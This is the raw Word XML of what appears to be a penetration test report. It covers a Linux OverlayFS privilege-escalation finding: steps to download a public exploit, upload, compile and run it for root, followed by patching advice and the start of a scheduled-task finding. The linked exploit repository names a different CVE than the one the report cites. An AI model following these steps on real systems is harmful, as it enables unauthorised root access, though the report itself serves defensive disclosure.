          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user to root</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="54998B9A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> by </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 xml:space="preserve">smuggling an SUID binary from a lower directory to an upper directory, with the </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se of</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v</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rlayF</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as an intermediar</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="61AC7F14">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">y. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="1798B0AA" w14:textId="2C75EFD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4195F26" w:rsidP="0D325B6E" w:rsidRDefault="74195F26" w14:paraId="5C868254" w14:textId="4E317DEE">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74195F2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F3A1DD0" w:rsidP="0D325B6E" w:rsidRDefault="5F3A1DD0" w14:paraId="4A573C10" w14:textId="40AFBAB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F3A1DD0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>An attacker with</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F3A1DD0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">low-privileged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ac</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cess to the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system</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 can take over the root user, giving them complete control over the system. With thi</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s, they c</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an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enumerate</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C70E127">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and search for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more sensitive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inf</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ormati</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on</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2E24F35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 or</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modif</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52FD45F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> or turn off services running on the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="13BB35B2" w14:textId="3C7C5DF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4195F26" w:rsidP="0D325B6E" w:rsidRDefault="74195F26" w14:paraId="4A277880" w14:textId="1124CC9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4195F2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35B5883" w:rsidP="0D325B6E" w:rsidRDefault="135B5883" w14:paraId="3DCA4E45" w14:textId="07E6570C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">ownloaded the exploit from: </w:t>
      </w:r>
      <w:hyperlink r:id="Rbe3fe0125b3349d3">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="135B5883">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:u w:val="none"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/briskets/CVE-2021-3493</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="135B5883" w:rsidP="0D325B6E" w:rsidRDefault="135B5883" w14:paraId="53ABFF6A" w14:textId="6E29F0EB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">Step 2: Upload the exploit C code to the machine via SCP using the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="135B5883">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35B5883">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3BD4834A" w:rsidP="0D325B6E" w:rsidRDefault="3BD4834A" w14:paraId="5AA2B399" w14:textId="1342BDBB">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D4834A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Once on the machine, compile the exploit code using </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3BD4834A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gcc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3BD4834A" w:rsidP="0D325B6E" w:rsidRDefault="3BD4834A" w14:paraId="44407FFB" w14:textId="225F4136">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D4834A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 4: Run the executable file to obtain root access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="391B8594" w14:textId="3CFD87B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4195F26" w:rsidP="0D325B6E" w:rsidRDefault="74195F26" w14:paraId="07F64C7B" w14:textId="5C3791E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4195F2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74195F26" w:rsidP="0D325B6E" w:rsidRDefault="74195F26" w14:paraId="294DDD8A" w14:textId="13AC3868">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="74195F2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4195F2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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="7DAA55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7DAA55C6" w:rsidP="0D325B6E" w:rsidRDefault="7DAA55C6" w14:paraId="6C2FC6F2" w14:textId="3E4B816D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>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DAA55C6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>All machines</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3431784">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>should b</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 xml:space="preserve">e updated to the latest version </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="65F25C6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of the kernel </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available, as exploits such as these are fixed rapidly within days of discove</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ry</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="51EF1A4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2487AC43" w:rsidP="0D325B6E" w:rsidRDefault="2487AC43" w14:paraId="5D519665" w14:textId="64D2BF5F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>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An auto-patchin</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g solution can automate th</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="303C0ADF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e patching</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="2487AC43">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> process, ens</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C1980FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>uring all systems are up to date without manual intervention</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3C485826">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C1980F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38ACD09F" w:rsidP="0D325B6E" w:rsidRDefault="38ACD09F" w14:paraId="2C0A604F" w14:textId="7E92F3CB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>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8ACD09F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note that a</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6C1980FD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n Ubuntu or Debian based system is likely to be vulnerable if it has a kernel version below 6.</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5448F9B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2, which can be verified with the comman</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5448F9B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">d </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5448F9B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>un</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5448F9B3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ame</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="6DC036D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448F9B3">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6DC036D5">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5C9C4C58" w14:textId="616FFB6B">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56311008" w:rsidP="0D325B6E" w:rsidRDefault="56311008" w14:paraId="41521164" w14:textId="39F032B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311008">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8F64429" w:rsidP="0D325B6E" w:rsidRDefault="78F64429" w14:paraId="5C54547D" w14:textId="7CED7283">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R042a735d0bac4bb9">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="78F64429">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>NIST - CVE-2023-0386</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="78F64429">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="78F64429" w:rsidP="0D325B6E" w:rsidRDefault="78F64429" w14:paraId="244C205F" w14:textId="36F0A9D3">
      <w:pPr>
        <w:spacing w:after="0" w:afterAutospacing="off"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R4186bd5dae9744db">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="78F64429">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
          </w:rPr>
          <w:t>WIZ - Ubuntu Overlay Vulnerability Explanation</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="78F64429">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="5FE04A84" w14:textId="7B9CD823">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="3F226E6A" w14:textId="5A964BE1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="1ED85CCA" w:rsidP="0D325B6E" w:rsidRDefault="1ED85CCA" w14:paraId="587062B0" w14:textId="30FE341C">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851381446" w:id="1518543265"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1ED85CCA">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1ED85CCA">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>H1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc1033644369" w:id="2107695443"/>
      <w:bookmarkStart w:name="_Toc2090024655" w:id="77138662"/>
      <w:bookmarkStart w:name="_Toc1206351901" w:id="907309975"/>
      <w:bookmarkStart w:name="_Toc659689205" w:id="880368798"/>
      <w:bookmarkStart w:name="_Toc263987692" w:id="976688954"/>
      <w:bookmarkStart w:name="_Toc1885476488" w:id="1861602570"/>
      <w:bookmarkStart w:name="_Toc590563207" w:id="1744142376"/>
      <w:bookmarkStart w:name="_Toc204900132" w:id="1019787852"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="13560F85">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="642994AB">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Editable Scheduled Task Running as Administrator</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1861602570"/>
      <w:bookmarkEnd w:id="1744142376"/>
      <w:bookmarkEnd w:id="1019787852"/>
      <w:bookmarkEnd w:id="2107695443"/>
      <w:bookmarkEnd w:id="77138662"/>
      <w:bookmarkEnd w:id="907309975"/>
      <w:bookmarkEnd w:id="880368798"/>
      <w:bookmarkEnd w:id="976688954"/>
      <w:bookmarkEnd w:id="151854326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6BA20D6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2891BB4" w14:textId="5785C82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87C8DD2" w14:textId="1075A7C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C7C2C9" w14:textId="6886F21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1B0033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7CAA134" w14:textId="0E71DA1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641241A" w14:textId="472F3B8A">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7A5ED44" w14:textId="15816FC9">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7D62F2B8">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>
              </w:rPr>
              <w:t>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AE1D454" w14:textId="0E506F7A">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54AEDEC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6157089" w14:textId="3B1622E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AFC8EF4" w14:textId="2D30D5F9">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66B706D"/>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EB968EA"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="2AEDB1E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443E46C" w14:textId="23FD28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74AD9E2" w:rsidP="0D325B6E" w:rsidRDefault="674AD9E2" w14:paraId="2D139F95" w14:textId="728B0CD5">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L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" r:id="R3fe43913e9354b03">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="fr-FR"/>
                </w:rPr>
                <w:t>AV:L</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AC</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="674AD9E2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
